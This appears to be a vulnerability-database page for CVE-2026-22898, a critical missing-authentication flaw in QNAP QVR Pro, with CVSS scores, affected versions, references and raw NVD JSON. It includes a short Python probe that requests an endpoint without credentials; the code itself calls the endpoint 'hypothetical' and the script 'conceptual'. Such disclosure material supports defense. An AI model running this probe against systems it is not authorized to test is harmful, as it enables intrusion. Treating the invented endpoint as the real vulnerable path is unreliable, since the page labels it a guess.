CVE-2026-22898

Description

A missing authentication for critical function vulnerability has been reported to affect QVR Pro. The remote attackers can then exploit the vulnerability to gain access to the system. We have already fixed the vulnerability in the following version: QVR Pro 2.7.4.14 and later

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qvr_pro:*:*:*:*:*:*:*:* - VULNERABLE

QVR Pro < 2.7.4.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_vulnerability(target_url):
    """
    Conceptual PoC for Missing Authentication Vulnerability.
    Attempts to access a protected endpoint without credentials.
    """
    # Hypothetical endpoint that requires auth but is missing it
    vulnerable_endpoint = "/api/v1/system/config"
    full_url = f"{target_url}{vulnerable_endpoint}"
    
    headers = {
        "User-Agent": "Vulnerability-Scanner/1.0",
        "Accept": "application/json"
    }

    try:
        # Sending request without Authorization header
        response = requests.get(full_url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Detected at {target_url}")
            print(f"[+] Response: {response.text[:100]}...")
        else:
            print(f"[-] Target does not appear vulnerable (Status: {response.status_code})")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://192.168.1.10:8080" # Replace with actual target IP
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22898
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22898
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22898/
[4] VulDB https://vuldb.com/cve/CVE-2026-22898
[5] https://www.qnap.com/en/security-advisory/qsa-26-07

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22898", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:44.307", "lastModified": "2026-04-14T14:33:30.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing authentication for critical function vulnerability has been reported to affect QVR Pro. The remote attackers can then exploit the vulnerability to gain access to the system.\n\nWe have already fixed the vulnerability in the following version:\nQVR Pro 2.7.4.14 and later"}, {"lang": "es", "value": "Se ha reportado una vulnerabilidad de autenticación ausente para función crítica que afecta a QVR Pro. Los atacantes remotos pueden entonces explotar la vulnerabilidad para obtener acceso al sistema.\n\nYa hemos corregido la vulnerabilidad en la siguiente versión:\nQVR Pro 2.7.4.14 y posteriores"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qvr_pro:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.7.1.1259", "versionEndExcluding": "2.7.4.1485", "matchCriteriaId": "73876E44-976A-4A41-8176-B28F3D39ED43"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-26-07", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}